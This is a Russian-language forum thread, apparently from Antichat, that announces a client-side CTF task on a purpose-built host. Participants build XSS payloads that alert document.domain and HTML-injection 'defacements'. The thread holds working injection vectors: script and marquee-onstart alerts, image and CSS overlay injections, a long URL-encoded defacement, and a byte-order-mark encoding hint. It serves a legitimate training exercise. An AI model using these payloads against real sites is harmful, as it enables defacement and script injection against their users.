Наверняка многие заметили, что в публикуемых тасках, преобладает сервер-сайд. И это не совсем честно по отношению к любителям другой стороны. Тем более, что античат является одним из первооткрывателей атак типа Cross Site Scripting и HTML Injection. А некоторые участники форума, заслуженно, получают респекты от ведущих мировых экспертов по безопасности в сфере клиент-сайда (!) Но правда в том, что CSS-ки уже давно не активные/пассивные, толерантный запад навязал нам свои Reflected и Stored, а эксплуатация стала довольно-таки нетривиальной. Поэтому, предлагаю показать здесь свои знания и умения в программировании на HTML, в нестандартных условиях, и немного понастальгировать css.ctf.antichat.com Правила просты: Для того чтобы проявить знание, нужно сконструировать XSS пейлод для текущих версий Chromium/Firefox, выводящий в алерте document.domain, и отправить мне в ЛС. Вектор может быть как с пользовательским взаимодействием (onmouseover, onclick и т.п.), так и без него. Пример: Code: http://css.ctf.antichat.com/?q=<script>alert(document.domain);</script> Spoiler: alert Умение, проявить проще, нужно сделать оригинальный дефейс и выложить его в этой теме. Пример: Code: http://css.ctf.antichat.com/?q=<h1>HACKED+BY+VASYA+PUPKIN</h1> Spoiler: screenshot Скриншоты желательны, но не обязателены Знающие: (таких нет пока) Умеющие: @ex0dus, @alexzir - Хостинг для таска предоставлен модной и молодёжной площадкой - ctf.antichat.com
http://css.ctf.antichat.com/index.php?i=<a href="https://antichat.com/" target="_blank" onclick=""><img src="https://i.ibb.co/H4FmFhP/123123123123.png"></a> Spoiler: Да пжалста)
круто) Только забыл <!-- чтобы тело спрятать http://css.ctf.antichat.com/index.p...//i.ibb.co/H4FmFhP/123123123123.png"></a><!--
http://css.ctf.antichat.com/?i=<mar...uee onstart=alert(document.domain) </marquee> Тело прятать не стал, без него эффект не тот
http://css.ctf.antichat.com/?i=<style>.hacked{position:absolute;width:1000px;height:1000px;margin-left:300px;}</style><img/class="hacked"/src=https://i.imgur.com/jKz7mmc.png> Spoiler: Click ^^
Окай, что-то негусто у нас с умеющими, а тем более со знающими, будем хинтить С самого старта задания присутствует бекап исходников - http://css.ctf.antichat.com/index.php~ В случае с XSS, атакующий контролирует первые байты документа (?) console.log(), в сорцах HTML, криво намекает, что пейлоды отлаживать следует именно так С этого момента, в CSP добавлен более широкий скоуп, что даёт большее количство вариантов эксплуатации в обоих случаях. Пример для "дефейса": Code: # Открывать в десктопном FireFox, хром какашка :( http://css.ctf.antichat.com/?i=%3Cimg/class=%27i%27/src=%27https://cdn.pixabay.com/photo/2015/10/08/16/14/click-978023_640.png%27/%3E%3Cstyle%3Ebody{cursor:pointer;color:yellow;transform:perspective(300px)%20rotateX(20deg);%20position:absolute;%20top:-200;%20bottom:200px;left:50px;right:50px;}marquee{width:100%;height:100%}.o{animation:blinker%203s%20linear%20infinite;}@keyframes%20blinker{50%%20{opacity:%200;}}.i{position:absolute;width:10%;top:10%;right:0%}.a{width:100%;height:100%;opacity:0;position:absolute;z-index:99}%3C/style%3E%3Caudio%20class=%22a%22%20controls%3E%3Csource%20src=%22https://antichat.com/attachments/10457/%22/type=%22audio/mpeg%22%3E%3C/audio%3E%3C/marquee%3E%3Cmarquee%20class=o%20direction=up%3E
https://www.w3.org/International/questions/qa-byte-order-mark Code: http://css.ctf.antichat.com/?i=%fe%ff%00